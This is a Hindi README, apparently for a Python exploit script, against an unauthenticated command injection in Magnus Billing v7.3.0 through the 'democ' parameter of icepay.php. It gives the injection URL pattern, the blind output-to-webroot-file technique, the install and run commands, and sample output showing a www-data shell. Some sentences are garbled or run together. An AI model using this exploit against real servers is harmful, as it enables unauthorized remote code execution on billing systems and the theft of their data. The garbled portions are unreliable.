
Magnus Billing v7.3.0 में अनधिकृत कमांड इंजेक्शन भेद्यता।
प्रमाणीकरण रहित कमांड इंजेक्शन भेद्यता Magnus Billing v7.3.0 में।
icepay.phpमेंdemocGET पैरामीटर बिना स्वच्छता के सीधे शेल फ़ंक्शन में पारित किया जाता है, जिससे वेब सर्वर उपयोगकर्ता के रूप में मनमाना कमांड निष्पादन संभव होता है। इंजेक्शन अंधा है — आउटपुट HTTP प्रतिक्रिया में प्रतिबिंबित नहीं होता — इसलिए यह शोषण प्रत्येक कमांड के आउटपुट को वेबरूट में एक फ़ाइल में रीडायरेक्ट करता है और इसे HTTP पर वापस लाता है।
/mbilling/lib/icepay/icepay.php?democ=;<command>; पर।out.txt) में रीडायरेक्ट करता है।यदि लक्ष्य एक अलग वेबरूट पथ का उपयोग करता है, तो स्क्रिप्ट के शीर्ष पर
OUTPUT_FILEको समायोजित करें।
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -t http://TARGET
उदाहरण:
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data